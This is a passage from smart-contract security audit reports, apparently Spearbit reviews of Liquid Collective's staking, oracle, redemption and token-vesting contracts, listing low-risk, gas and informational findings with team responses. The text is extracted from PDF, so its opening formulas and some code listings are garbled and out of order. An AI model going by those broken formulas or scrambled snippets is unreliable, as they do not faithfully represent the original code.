vars.postReportUnderlyingBalance and vars.preReportUnderlyingBalance (almost if one adds a check for non-decreases of validator counts). u u : postUnderlyingBalanceIncludingExits u : preUnderlyingBalanceIncludingExits u (cid:0) Bpre u : vars.postReportUnderlyingBalance : vars.preReportUnderlyingBalance : Breport,post (cid:0) Breport,pre u u • Bpost u • Bpre • (cid:1)Bu: Bpost • Breport,post • Breport,pre u • (cid:1)Breport u • Bprev v : u • Bcurr v • (cid:1)Bv : Bcurr • Bprev s • Bcurr s • (cid:1)Bs: Bcurr • Bprev e • Bcurr e • (cid:1)Be: Bcurr previous reported/stored value for total validator balances in CL LastConsensusLayerRe- port.get().validatorsBalance v (cid:0) Bprev v (can be negative) : current reported value of total validator balances in CL report.validatorsBalance : LastConsensusLayerReport.get().validatorsSkimmedBalance : report.validatorsSkimmedBalance s (cid:0) Bprev s (always non-negative, this is an invariant that gets checked). : LastConsensusLayerReport.get().validatorsExitedBalance : report.validatorsExitedBalance e (cid:0) Bprev e (always non-negative, this is an invariant that gets checked). • $Cˆ{prev} $: LastConsensusLayerReport.get().validatorsCount • Ccurr : report.validatorsCount • (cid:1)C: Ccurr (cid:0) Cprev (this value should be non-negative, note this invariant has not been checked in the code- base) • Cdeposit : DepositedValidatorCount.get() • Bd : BalanceToDeposit.get() 22 • Bc: CommittedBalance.get() • Br : BalanceToRedeem.get() Note that the above values are assumed to be in their form before the current report gets stored in the storage. Then we would have Bpost u = Bcurr v + Bcurr s + Bcurr e = Bpre u + (cid:1)Bv + (cid:1)Bs + (cid:1)Be (cid:0) 32(cid:1)C and so: (cid:1)Bu = (cid:1)Bv + (cid:1)Bs + (cid:1)Be (cid:0) 32(cid:1)C = (cid:1)Breport u Recommendation: Defining the 2 variables Bpost and Bpre seems unnecessary and one could check for the required boundary conditions, calculate the reward and vars.availableAmountToUpperBound only using (cid:1)Breport : u u u (cid:1)Bv + (cid:1)Bs + (cid:1)Be (cid:0) 32(cid:1)C And that can also be simplified to reduce reading multiple times from storage. The only places that postUnderlyingBalanceIncludingExits and preUnderlyingBalanceIncludingExits are actually used are in revert parameters when boundary conditions are not met (1, 2). Related issue: Report's validatorsCount's historical non-discreteness does not get checked Liquid Collective: Addressed in commit 528a77d6. Spearbit: Verified. +6.6.3 The formula or the parameter names for calculating currentMaxDailyCommittableAmount can be made more clear Severity: Informational Context: River.1.sol#L597-L602 Description: currentMaxDailyCommittableAmount is calculated using the below formula: // we compute the max daily committable amount by taking the asset balance without the balance to deposit into account ,! uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - ,! currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); Therefore its value is the maximum of two potential maximum values. Recommendation: It might make sense to use the minimum of the two potential maximum values to make sure the final result is always less than the two suggested upper bound. Liquid Collective: max was chosen here because the net amount is seen as a "bootstrapping" amount when the underlying balance is low, then it switches to relative value once the underlying value increases. Spearbit: dcl.maxDailyNetCommittableAmount as the current name might be slightly confusing. It would be best to document this choice and also pick a different parameter name for Comments have been added in PR 198. And also this commit bfd3b5 ensures that dcl.maxDailyRelativeCommittableAmount does not exceed BASIS_- POINTS_MAX. 23 +6.6.4 preExitingBalance is a rough estimate for signalling the number of validators to request to exit Severity: Informational Context: River.1.sol#L556-L574 Description: exitingBalance and preExitingBalance might be trying to compensate for the same portion of balance (non-stopped validators which have been signaled to exit and are in the CL exit queue). That means the number of validatorCountToExit calculated to accommodate for the redeem demand is actually lower than what is required. The important portion of preExitingBalance is for the validators that were singled to exit in the previous reporting round but the operators have not registered them for exit in CL. Also totalStoppedValidatorCount can include slashed validator counts which again lowers the required validatorCountToExit and those values should not be accounted for here. Perhaps the oracle members should also report the slashing counts of validators so that one can calculate these values more accurately. Recommendation: It would be best to add more documentation around the key parameters used in these calcu- lations to make sure it is known what they exactly represent. Liquid Collective: As soon as we detect a validator starting its exit process, the count of stopped validators is increased for the operator (so it is accounted for in the totalStoppedValidatorCount). So this value accounts for exits that would be expected from the operators but haven't been detected yet and are not yet accounted into the stopped count and exiting balance. For the differentiation between exited and slashed validators, this is something we can do but I think it would be better to have a common and unique flow for validators that are stopped, no matter the reason. It will indeed create a delta with the demand (ex: we expect 32 ETH and we receive ~30) but the system is able to re-compute the demand and ask for additional exits in such scenarios. Spearbit: The fact that the stopped validator count starts when the validator starts its exit process should be documented. In commit 2b79e1 comments have been added in regards to the usage of exitingBalance. +6.6.5 More documentation can be added regarding the currentMaxDailyCommittableAmount calculation Severity: Informational Context: River.1.sol#L597-L602 Description: currentMaxDailyCommittableAmount calculated as // we compute the max daily committable amount by taking the asset balance without the balance to deposit into the account ,! uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - ,! currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); We can add further to the comment: Since before the _commitBalanceToDeposit hook is called we have skimmed the remaining to redeem balance to BalanceToDeposit, underlyingAssetBalance - currentBalanceToDeposit represent the funds allocated for CL (funds that are already in CL, funds that are in transit to CL or funds committed to be deposited to CL). It is important that the redeem balance is already skimmed for this upper bound calculation, so for future code changes we should pay attention to the order of hook callbacks otherwise the upper bounds would be different. Recommendation: Document/comment on the above for better clarity around the calculation of currentMaxDai- lyCommittableAmount. 24 Liquid Collective: More comments have been added in • commit 9b69bc • commit 769bda Spearbit: Verified. +6.6.6 BalanceToRedeem is only non-zero during a report processing transaction Severity: Informational Context: River.1.sol#L440-L445, River.1.sol#L468-L470, River.1.sol#L511, River.1.sol#L551, River.1.sol#L580- L588 Description: BalanceToRedeem is only ever posses a non-zero value during the report processing when a quorum has been made for the oracle member votes (setConsensusLayerData). And at the very end of this process its value gets reset back to 0. Recommendation: It would be best to document the above fact and if it is not required to keep this value in the storage, one can utilise the stack or memory space. Liquid Collective: This is something we discussed and we decided to keep it in storage for now for possible future update on the reporting flow where exit funds might be kept between reports (and not automatically balanced back to deposits). But yes in this implementation case, balanceToRedeem == 0 outside of state transitions. Spearbit: Verified. +6.6.7 Improve clarity on bufferRebalancingMode variable Severity: Informational Context: OracleManager.1.sol#L441, River.1.sol#L545, River.1.sol#L580-L588 Description: According to the documentation, the bufferRebalancingMode flag passed by the oracle should allow or disallow the rebalancing of funds between the Deposit and Redeem buffers. The flag correctly disables rebalancing in the DepositBuffer to RedeemBuffer direction as can be seen here if (depositToRedeemRebalancingAllowed && availableBalanceToDeposit > 0) { uint256 rebalancingAmount = LibUint256.min( availableBalanceToDeposit, redeemManagerDemandInEth - exitingBalance - availableBalanceToRedeem ); if (rebalancingAmount > 0) { availableBalanceToRedeem += rebalancingAmount; _setBalanceToRedeem(availableBalanceToRedeem); _setBalanceToDeposit(availableBalanceToDeposit - rebalancingAmount); } } but it is not used at all when pulling funds in another way // if funds are left in the balance to redeem, we move them to the deposit balance _skimExcessBalanceToRedeem(); Recommendation: Consider renaming the variable and updating the documentation so it is clear that the flag is only supposed to control rebalancing to the redeem buffer. Liquid Collective: This variable has been renamed to rebalanceDepositToRedeemMode in PR 196. Spearbit: Verified. 25 +6.6.8 Fix code style consistency issues Severity: Informational Context: Most of the diff breaches the code style Description: There is a small code styling mismatch between the new code under audit and the style used through the rest of the code. Specifically, function parameter names are supposed to be prepended with _ to differentiate them from variables defined in the function body. Recommendation: Prepend function parameter names with _ to match the rest of the codebase. Liquid Collective: Fixed in PR 198. Spearbit: Fixed. +6.6.9 Remove unused constants Severity: Informational Context: Oracle.1.sol#L26 Description: DENOMINATION_OFFSET is unused and can be removed from the codebase. Recommendation: If the constants in this context are not going to be used, it would be best to remove them from the codebase to keep it project cleaner. Liquid Collective: Fixed in commit 7f15e6. OracleV1.ONE_YEAR has also been removed. Spearbit: Verified. +6.6.10 Document what TotalRequestedExits can potentially represent Severity: Informational Context: OperatorsRegistry.1.sol#L708-L711, TotalRequestedExits.sol#L8 Description: Documentation is lacking for TotalRequestedExits. This parameter represents a quantity that is a mix of exited (or to be exited) and slashed validators for an operator. Also, in general, this is a rough quantity since we don't have a finer reporting of slashed and exited validators (they are reported as a sum). Recommendation: It would be great to add more documentation for this value and perhaps change its name (the parameter name is a bit misleading). Liquid Collective: TotalRequestedExits has been removed from the codebase in PR 195. So this issue does not apply anymore. Spearbit: Verified. +6.6.11 Operators need to listen to RequestedValidatorExits and exit their validators accordingly Severity: Informational Context: OperatorsRegistry.1.sol#L700 Description: Operators need to listen to RequestedValidatorExits and exit their validators accordingly emit RequestedValidatorExits(operators[idx].index, requestedExits + operators[idx].picked); Note that requestedExits + operators[idx].picked represents the upper bound for the index of the funded validators that need to be exited by the operator. Recommendation: Make sure the daemon clients are set up properly to execute the required actions upon receiving these events. Liquid Collective: Acknowledged. 26 Spearbit: Acknowledged. +6.6.12 Oracle members would need to listen to ClearedReporting and report their data if necessary Severity: Informational Context: Oracle.1.sol#L302 Description: Oracle members would need to listen to ClearedReporting event and report their data if necessary Recommendation: Off-chain daemon needs to be configured to listen to this event and perform the required actions. Liquid Collective: Acknowledged. Spearbit: Acknowledged. +6.6.13 The only way for an oracle member to change its report data for an epoch is to reset the reporting process by changing its address Severity: Informational Context: Oracle.1.sol#L238-L241, Oracle.1.sol#L189-L201 Description: If an oracle member has made a mistake in its CL report to the Oracle or for some other reason would like to change its report, it would not be able to due to the following if block: // we retrieve the voting status of the caller, and revert if already voted if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(report.epoch, msg.sender); } The only way for the said oracle member to be able to report different data is to reset its address by calling setMember. This would cause all the report variants and report positions to be cleared and force all the other oracle members to report their data again. Related: • Any oracle member can censor almost quorum report variants by resetting its address. Recommendation: Document the scenario in this issue and if desired make it possible for an oracle member to change its report before a quorum is made (it can also be a time-based editing window). Liquid Collective: Yes, this is a side effect of the oracle voting system, where in case of no quorum, a new frame would be the only solution to make things move forward in the votes. This is not the case anymore after remediations (commit aadbfb), now there are no ways to change the vote and we should wait for the next frame to be able to vote again. Spearbit: Acknowledged. 27 +6.6.14 For a quorum making CL report the epoch restrictions are checked twice. Severity: Informational Context: Oracle.1.sol#L228-L231, OracleManager.1.sol#L268-L271 Description: When an oracle member reports to the Oracle's reportConsensusLayerData, the requirements for a valid epoch is checked once in reportConsensusLayerData: // checks that the report epoch is not invalid if (!river.isValidEpoch(report.epoch)) { revert InvalidEpoch(report.epoch); } and once again in setConsensusLayerData // we start by verifying that the reported epoch is valid based on the consensus layer spec if (!_isValidEpoch(cls, report.epoch)) { revert InvalidEpoch(report.epoch); } Note that only the Oracle can call the setConsensusLayerData endpoint and the only time the Oracle makes this call is when the quorum is reached in reportConsensusLayerData. Recommendation: The second check inside setConsensusLayerData can be removed, but a comment should be made that the check has been performed in reportConsensusLayerData to make sure future changes would not cause this check to be skipped. Liquid Collective: We would prefer keeping it in both • On the Oracle side, this prevents members from erasing reports by reporting invalid epochs that are greater than the current frame first epoch. • On River, in the same spirit as what we decided to do by bringing all sanity checks inside the core contract, I would prefer being able to ensure a report is valid without assuming the behavior of the oracle contract as this contract might change in the future. Spearbit: Acknowledged. +6.6.15 Clear report variants and report position data during the migration to the new contracts Severity: Informational Context: Oracle.1.sol#L36 Description: Upon migration to the new contract with a new type of reporting data the old report positions and variants should be cleared by calling _clearReports() on the new contract or an older counterpart on the old contract. Note that the report variants slot will be changed from: bytes32(uint256(keccak256("river.state.reportsVariants")) - 1) to: bytes32(uint256(keccak256("river.state.reportVariants")) - 1) Recommendation: Make sure the reporting data is cleaned before the next round of reporting process after the migration. Liquid Collective: Fixed in PR 193 by clearing the report data upon reinitialization and also the report variants slot has been restored to its original slot. Spearbit: Verified. Need to make sure oracle.initOracleV1_1() is called in the migration sequence to trigger the report cleanup. 28 +6.6.16 Remove unused functions from Oracle Severity: Informational Context: • Oracle.1.sol#L115 • Oracle.1.sol#L120 • Oracle.1.sol#L125 • Oracle.1.sol#L130 • Oracle.1.sol#L140 • Oracle.1.sol#L145 • Oracle.1.sol#L150 • Oracle.1.sol#L155 • Oracle.1.sol#L160 Description: The following functions are unused and can be removed from the Oracle's implementation • isValidEpoch • getTime • getExpectedEpochId • getLastCompletedEpochId • getCurrentEpochId • getCLSpec • getCurrentFrame • getFrameFirstEpochId • getReportBounds Recommendation: It might be best to remove these endpoints to keep the codebase clean. These endpoints are just wrapped around the corresponding endpoint from the River contract. Liquid Collective: This is for off-chain and was a request to keep the oracle contract similar to its old version from the view call point of view. Functions have been removed in commit f73551. Spearbit: Verified. +6.6.17 RedeemManager. _claimRedeemRequests - Consider adding the recipient to the revert message in case of failure Severity: Informational Context: RedeemManager.1.sol#L454 Description: The purpose of the _claimRedeemRequests function is to facilitate the claiming of ETH on behalf of another party who has a valid redeem request. It is worth noting that if any of the calls to recipients fail, the entire transaction will revert. Although it is impossible to conduct a denial-of-service (DoS) attack in this scenario, as the worst-case scenario only allows the transaction sender to specify a different array of redeemRequestIds, it may still be challenging to determine the specific redemption request that caused the transaction to fail. Recommendation: Consider adding the recipient to the revert message. 29 Liquid Collective: Fixed in commit 28602e. Spearbit: Verified. +6.6.18 River.1.sol should not have a permission to call requestRedeem(uint256 lsETHAmount) Severity: Informational Context: RedeemManager.1.sol#L114 Description: The function RedeemManagerAddress .requestRedeem(uint256 lsETHAmount) is not being called by the River.1.sol contract currently. In accordance with the principle of least privilege, any permissions or privi- leges that are not strictly necessary should be removed. Therefore, it is recommended to remove the permission for the River.1.sol contract to call this function. This will help to minimize the attack surface and reduce the risk of unauthorized access or misuse of the function. Liquid Collective: Fixed in commit e76fd5 by removing the unnecessary permission from RedeemManagerAd- dress.requestRedeem(uint256 lsETHAmount). Spearbit: Verified. +6.6.19 Exit validator picking strategy does not consider slashed validator between reported epoch and current epoch Severity: Informational Context: Operators.2.sol#L281, OperatorsRegistry.1.sol#L615 Description: The current picking strategy in the OperatorsRegistry._pickNextValidatorsToExitFromActive- Operators function relies on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed and so the strategy might pick and signal to the operators those validators that have been slashed. As a result, the suggested number of validators to exit the protocol to compensate for the redemption demand in the next round of reports might not be exactly what was requested. Similarly, the OperatorsV2._hasExitableKeys function only evaluates based on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed. Thus, some returned operators might not have exitable keys in the current epoch. Recommendation: It might not be possible to obtain real-time information on the slashed validators while picking the validator to exit due to various technical limitations (e.g. delay between components). Consider documenting this limitation. Liquid Collective: We have taken the decision to not separate slashed from stopped validators. This has an impact on the amount received due to exits but It's accepted and the system can handle the problem by requesting another exit if the amount does not match the exit demand. Also, the OperatorsRegistry is able to "catch up" in case of stopped > exitRequests. Spearbit: Acknowledged. +6.6.20 Duplicated functions Severity: Informational Context: Operators.2.sol#L142, OperatorsRegistry.1.sol#L484 Description: _getStoppedValidatorsCountFromRawArray functions are the same. Operator.2._getStoppedValidatorCountAtIndex The and OperatorsRegistry.1. 30 function _getStoppedValidatorCountAtIndex(uint32[] storage stoppedValidatorCounts, uint256 if (index + 1 >= stoppedValidatorCounts.length) { return 0; } return stoppedValidatorCounts[index + 1]; function _getStoppedValidatorsCountFromRawArray(uint32[] storage stoppedValidatorCounts, internal view returns (uint32) index) File: Operators.2.sol 142: ,! 143: 144: 145: 146: 147: 148: 149: 150: 151: { } uint256 operatorIndex) internal view returns (uint32) File: OperatorsRegistry.1.sol 484: ,! 485: 486: 487: 488: 489: 490: 491: 492: 493: return 0; { } if (operatorIndex + 1 >= stoppedValidatorCounts.length) { } return stoppedValidatorCounts[operatorIndex + 1]; Recommendation: Consider removing one of the functions. Liquid Collective: Fixed in PR 195. Spearbit: Verified. +6.6.21 Funds might be pulled from CoverageFundV1 even when there has been no slashing incident. Severity: Informational Context: CoverageFund.1.sol#L18-L19, OracleManager.1.sol#L416-L422 Description: vars.availableAmountToUpperBound might be positive even though no validators have been slashed. In this case, we still pull funds from the coverage funds contract to get closer to the upper bound limit: // if we have available amount to upper bound after pulling the exceeding eth buffer, we attempt to pull coverage funds ,! if (vars.availableAmountToUpperBound > 0) { // we pull the funds from the coverage recipient vars.trace.pulledCoverageFunds = _pullCoverageFunds(vars.availableAmountToUpperBound); // we do not update the rewards as coverage is not considered rewards // we do not update the available amount as there are no more pulling actions to perform afterwards } So it is possible the slashed coverage funds get used even when there has been no slashing to account for. Recommendation: Either update the NatSpec comment finer implementation needs to be introduced that account for the slashed validators directly. for CoverageFundV1 to document the above case or a Liquid Collective: Pulling funds from CoverageFunds is an independent procedure from the Oracle report. Fol- lowing a slash, an off-chain resolution for reimbursement will occur, and reimbursement can happen a long time after the slash happens. The CoverageFund should be seen as an independent component allowing the injection of ETH into the system without minting LsETH. 31 Spearbit: Acknowledged. Pulling funds from CoverageFunds happens when oracle members come to a quorum, so it is directly related to the reporting process. But when funds get deposited to CoverageFundV1 by allowed parties is a different procedure. It would be best to document the depositing aspect and also if extra funds have been injected into CoverageFundV1 for possible future slashing events, before those events happen it is possible for the funds to get used as mentioned in this issue. +6.6.22 Update inline documentation Severity: Informational Context: • OracleManager.1.sol#L61 • OracleManager.1.sol#L472 • OracleManager.1.sol#L483 • OracleManager.1.sol#L495 • IOracle.1.sol#L204 • Oracle.1.sol#L189 Description: • OracleManager.1.sol functions highlighted in Context are missing the @return natspec. • IOracle.1.sol#L204's highlighted comment is outdated. setMember can now also be called by the member itself. Also, there is a typo: adminitrator -> administrator. File: IOracle.1.sol 204: 209: /// @dev Only callable by the adminitrator @audit typo and outdated function setMember(address _oracleMember, address _newAddress) external; modifier onlyAdminOrMember(address _oracleMember) { if (msg.sender != _getAdmin() && msg.sender != _oracleMember) { revert LibErrors.Unauthorized(msg.sender); File: Oracle.1.sol 28: 29: 30: 31: 32: 33: ... 189: ,! } _; } function setMember(address _oracleMember, address _newAddress) external onlyAdminOrMember(_oracleMember) { Recommendation: Update the above inline documentation. Liquid Collective: Fixed in PR 198. Spearbit: Verified. 32 +6.6.23 Document/mark unused (would-be-stale) storage parameters after migration Severity: Informational Context: • CLValidatorCount.sol#L10 • CLValidatorTotalBalance.sol#L10-L11 • LastOracleRoundId.sol#L10-L11 • Operators.1.sol#L10 • ReportVariants.sol#L8-L9 Description: The following storage parameters will be unused after the migration of the protocol to v1 • CLValidatorCount • CLValidatorTotalBalance • LastOracleRoundId.sol • OperatorsV1, this will be more than one slot (it occupies regions of storage) • ReportVariants, the slot has been changed (that means right after migration ReportVariants will be an empty array by default): bytes32(uint256(keccak256("river.state.reportsVariants")) - 1); - bytes32 internal constant REPORTS_VARIANTS_SLOT = ,! + bytes32 internal constant REPORT_VARIANTS_SLOT ,! = bytes32(uint256(keccak256("river.state.reportVariants")) - 1); Recommendation: Document/mark unused (would-be-stale) storage parameters after migration. Liquid Collective: The reports variant slot has been restored to its original slot, so this issue does not apply to it anymore • commit bcbb09. The other slots have been marked in • commit c32fc9. Spearbit: Verified. +6.6.24 pullEth, pullELFees and pullExceedingEth do not check for a non-zero amount before sending funds to River Severity: Informational Context: • ELFeeRecipient.1.sol#L31-L32 • RedeemManager.1.sol#L157-L158 • Withdraw.1.sol#L42-L43 • CoverageFund.1.sol#L46-L49 Description: pullCoverageFunds makes sure that the amount sending to River is non-zero before calling its corresponding endpoint. This behavior differs from the implementations of • pullELFees • pullExceedingEth • pullEth 33 Not checking for a non-zero value has the added benefit of saving gas when the value is non-zero, while the check for a non-zero value before calling back River saves gas for cases when the amount could be 0. Recommendation: It would be best to keep the implementation of these 4 pulling mechanisms consistent by either having or excluding the non-zero amount check. Liquid Collective: Fixed in commit 01078a. Spearbit: Verified. 34 diff --git a/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review-Sept.txt b/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review-Sept.txt new file mode 100644 index 0000000..a758d44 --- /dev/null +++ b/findings_newupdate/spearbit/LiquidCollectivePR-Spearbit-Security-Review-Sept.txt @@ -0,0 +1,12 @@ +5.1.1 Schedule amounts cannot be revoked or released Severity: Low Risk Context: L434, ERC20VestableVotesUpgradeable.1.sol#L303-L306 TLC_globalUnlockScheduleMigration.sol#L62-L72, ERC20VestableVotesUpgradeable.1.sol#L432- Description: The migration for schedule ids 9 to 12 has the following parameters: // 9 -> 12 migrations[3] = VestingScheduleMigration({ scheduleCount: 4, newStart: 0, newEnd: 1656626400, newLockDuration: 72403200, setCliff: true, setDuration: true, setPeriodDuration: true, ignoreGlobalUnlock: false }); The current start is 7/1/2022 0:00:00 and the updated/migrated end value would be 6/30/2022 22:00:00, this will cause _computeVestedAmount(...) to always return 0 where one is calculating the released amount due to capping the time by the end timestamp. And thus tokens would not be able to be released. Also these tokens cannot be revoked since the set [start, end] where end < start would be empty. Recommendation: Perhaps we should make sure that the new end timestamp is at least start + cliffDuration + delta (for partial release) or start + duration (for full release). Liquid Collective: Fixed in commit b66cc8. Spearbit: Fixed in commit b66cc8 by ensuring that end = start + duration. +5.1.2 A revoked schedule might be able to be fully released before the 2 year global lock period Severity: Low Risk Context: ERC20VestableVotesUpgradeable.1.sol#L410-L412, ERC20VestableVotesUpgradeable.1.sol#L458 Description: The unlockedAmount calculated in _computeGlobalUnlocked(...) is based on the original sched- uledAmount. If a creator revokes its revocable vesting schedule and change the end time to a new earlier date, this formula does not use the new effective amount (the total vested amount at the new end date). And so one might be able to release the vested tokens before 2 years after the lock period. Recommendation: If it is required for a beneficiary to only be able to release the effective total vested amount (even after revoking) after 2 years from the lock end date, the logic in _releaseVestingSchedule(_index) needs to be updated to take into consideration the updated effective vested amount at the end of the schedule and not the original schedule amount. Liquid Collective: Client confirms this is the expected behavior. Spearbit: Acknowledged. 4 +5.1.3 Unlock date of certain vesting schedules does not meet the requirement Severity: Low Risk Context: TLC_globalUnlockScheduleMigration.sol#L359 Description: All vesting schedules should have the unlock date (start + lockDuration) set to 16/10/2024 0:00 GMT+0 post-migration. The following is the list of vesting schedules whose unlock date does not meet the requirement post-migration: Index Unlock Date 19,21,23 16/10/2024 9:00 GMT+0 36-60 16/10/2024 22:00 GMT+0 Recommendation: Update the affected vesting schedules to ensure that the unlock date is set to 16/10/2024 0:00 GMT+0 after the migration. Liquid Collective: Fixed in commit 340d9f. Spearbit: Fixed in commit 340d9f by implementing the auditor's recommendation to update the unlock date of the affected vesting schedules to 16/10/2024 0:00 GMT+0 post-migration. +5.1.4 ERC20VestableVotesUpgradeableV1._computeVestingReleasableAmount: Users VestingSchedule.releasedAmount > globalUnlocked will be temporarily denied of service with Severity: Low Risk Context: ERC20VestableVotesUpgradeable.1.sol#L413 Description: The current version of the code introduces a new concept; global unlocking. The idea is that wher- ever IgnoreGlobalUnlockSchedule is set to false, the releasable amount will be the minimum value between the original vesting schedule releasable amount and the global unlocking releasable amount (the constant rate of VestingSchedule.amount / 24 for each month starting at the end of the locking period). The implementa- tion ,however, consists of an accounting error caused by a wrong implicit assumption that during the execution of _computeVestingReleasableAmount globalUnlocked should not be less than releasedAmount. In reality, how- In that case globalUnlocked - ever, this state is possible for users that had already claimed vested tokens. releasedAmount will revert for an underflow causing a delay in the vesting schedule which in the worst case may last for two years. Originally this issue was meant to be classified as medium risk but since the team stated that with the current deployment, no tokens will be released whatsoever until the upcoming upgrade of the TLC contract, we decided to classify this issue as low risk instead. Recommendation: Assuming that the intended functionality is that the 1/24 of the total vesting schedule amount should be releasable every month starting from the end of the locking period, regardless of previous claims, then you may want to consider the following proposal for the _computeVestingReleasableAmount function. Note that _vestingSchedule.maxLeftToBeClaimed should be initialized to _vestingSchedule.amount - _vestingSched- ule.releasedAmount as part of the migration script. 5 function _computeVestingReleasableAmount( VestingSchedulesV2.VestingSchedule storage _vestingSchedule, uint256 _time, uint256 _index ) internal view returns (uint256) { uint256 releasedAmount = _vestingSchedule.releasedAmount; uint256 vestedAmount = _computeVestedAmount(_vestingSchedule, _time > _vestingSchedule.end ? _vestingSchedule.end : ,! _time); if (vestedAmount > releasedAmount) { if (!IgnoreGlobalUnlockSchedule.get(_index)) { uint256 globalUnlocked = _computeGlobalUnlocked( _vestingSchedule.amount, _time - (_vestingSchedule.start + ,! _vestingSchedule.lockDuration) ); if(_vestingSchedule.amountAcc < _vestingSchedule.maxLeftToBeClaimed){ globalUnlocked = LibUint256.min(globalUnlocked, _vestingSchedule.maxLeftToBeClaimed); uint256 amount = LibUint256.min(vestedAmount - releasedAmount, globalUnlocked - ,! _vestingSchedule.amountAcc); _vestingSchedule.amountAcc += amount; return amount; } return LibUint256.min(vestedAmount - releasedAmount, globalUnlocked - releasedAmount); } unchecked { return vestedAmount - releasedAmount; } } return 0; } Please make sure to test this function thoroughly before deployment. intended functionality, consider adding a custom error for the described underflow and revert. In case the described issue is part of the Liquid Collective: Fixed in commit 9d7cdb. Spearbit: Fixed in commit 9d7cdb by implementing the auditor's recommendation to add a custom error for the described underflow. +5.1.5 TlcMigration.migrate: Missing input validation Severity: Low Risk Context: TLC_globalUnlockScheduleMigration.sol#L365-L386 Description: The upcoming change in some of the vesting schedules is going to be executed via the migrate function which at the current version of the code is missing necessary validation checks to make sure no erroneous values are inserted. Recommendation: Consider adding the following post-effects validation checks: 1. Make sure that VestingSchedule.cliffDuration can not be longer than the total duration (VestingSchedule.duration). 2. VestingSchedule.end should ule.cliffDuration + delta ule.duration (for full release). (for not be partial less release) than or VestingSchedule.start + VestingSched- VestingSchedule.start + VestingSched- 3. Make sure that all vesting schedules have the unlock date VestingSchedule.start + VestingSched- ule.lockDuration set to 16/10/2024 0:00 GMT+0. 6 Liquid Collective: Fixed in commit 340d9f and commit 4f63c4. Spearbit: Fixed in commit 340d9f and commit 4f63c4 by implementing the auditor's recommendations. 5.2 Gas Optimization +5.2.1 Optimise the release amount calculation Severity: Gas Optimization Context: ERC20VestableVotesUpgradeable.1.sol#L413 Description: In the presence of a global lock schedule one calculates the release amount as: LibUint256.min(vestedAmount - releasedAmount, globalUnlocked - releasedAmount) Recommendation: We can avoid one subtraction by moving the releasedAmount out of the min function: LibUint256.min(vestedAmount, globalUnlocked) - releasedAmount Note also that LibUint256.min(vestedAmount, globalUnlocked) represent the total amount of vested tokens that could have been released at the current timestamp. Liquid Collective: Fixed in commit 0e8d82. Spearbit: Fixed in commit 0e8d82. +5.2.2 Use msg.sender whenever possible Severity: Gas Optimization Context: ERC20VestableVotesUpgradeable.1.sol#L383 ERC20VestableVotesUpgradeable.1.sol#L319, ERC20VestableVotesUpgradeable.1.sol#L356, Description: checked to be equal to msg.sender: In this context the parameters vestingSchedule.{creator, beneficiary} have already been if (msg.sender != vestingSchedule.X) { revert LibErrors.Unauthorized(msg.sender); } Recommendation: It would be cheaper to avoid reading from storage vestingSchedule.{creator, benefi- ciary} and use msg.sender in this context. It might also make sense to change all occurrences of msg.sender to _msgSender(). Liquid Collective: Fixed in commit e852d5. Spearbit: Fixed in commit e852d5. 7 5.3 Informational +5.3.1 Test function testMigrate uses outdated values for assertion Severity: Informational Context: TLC_globalUnlockScheduleMigration.t.sol#L60-L108 Description: In commit fbcc4ddd6da325d60eda113c2b0e910aa8492b88, the newLockDuration values were up- dated in TLC_globalUnlockScheduleMigration.sol. However, the testMigrate function was not updated ac- cordingly and still compares schedule.lockDuration to the outdated newLockDuration values, resulting in failing assertions. Recommendation: Update the values being asserted to schedule.lockDuration in the testMigrate function to match the updated newLockDuration values, ensuring the test is up to date and the assertions pass. Liquid Collective: Fixed in PR 232. Spearbit: Acknowledged. +5.3.2 Rounding Error in Unlocked Token Amount Calculation at ERC20VestableVotesUpgradea- ble.1.sol#L458 Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L458 Description: There is a rounding error in calculating the unlocked amount, which may lead to minor discrepancies in the tokens available for release. Recommendation: To avoid this rounding error, you can change the formula from: uint256 unlockedAmount = (scheduledAmount / 24) * (timeSinceLocalLockEnd / (365 days / 12)); to: uint256 unlockedAmount = (scheduledAmount * timeSinceLocalLockEnd) / (24 * (365 days / 12)); Liquid Collective: The rounding error is wanted, we don't want to unlock the token linearly but in blocks of 1/24th every month. Spearbit: Acknowledged +5.3.3 It might take longer than 2 years to release all the vested schedule amount after the lock period ends Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L413 Description: It is possible that in the presence of the global lock, releasing the total vested value might take longer than 2 years if the lockDuration + 2 years is comparatively small when compared to duration (or start - end). We just know that after 2 years all the scheduled amount can be released but only a portion of it might have been vested. Recommendation: If this an expected behaviour it might be useful to at least add a comment mentioning this issue. Liquid Collective: A comment has been added in commit 3dc76b. Spearbit: A comment has been added in commit 3dc76b. 8 +5.3.4 _computeVestingReleasableAmount's_time input parameter can be removed/inlined Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L122-L127, ERC20VestableVotesUpgradeable.1.sol#L341- L348, ERC20VestableVotesUpgradeable.1.sol#L400-L404 Description: At both call sites to _computeVestingReleasableAmount(...), time is _getCurrentTime(). Recommendation: One can remove the _time input parameter from _computeVestingReleasableAmount and instead inline _getCurrentTime() in its implementation (unless the devs plan to use this internal function with times other than _getCurrentTime()). Moreover, we can refactor the time validity just before the calls to _computeVestingReleasableAmount(...) and move them into that function by passing a flag to _computeVestingReleasableAmount(...): function _computeVestingReleasableAmount( VestingSchedulesV2.VestingSchedule memory _vestingSchedule, bool revokeInvalidTime, uint256 _index ) internal view returns (uint256) { uint256 time = _getCurrentTime(); if (time < (vestingSchedule.start + vestingSchedule.lockDuration)) { if(revokeInvalidTime) { // before lock no tokens can be vested revert VestingScheduleIsLocked(); } else { return 0; } } ... } Liquid Collective: Fixed in commit 42058b. Spearbit: Fixed in commit 42058b. +5.3.5 Comments and NatSpec Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L441 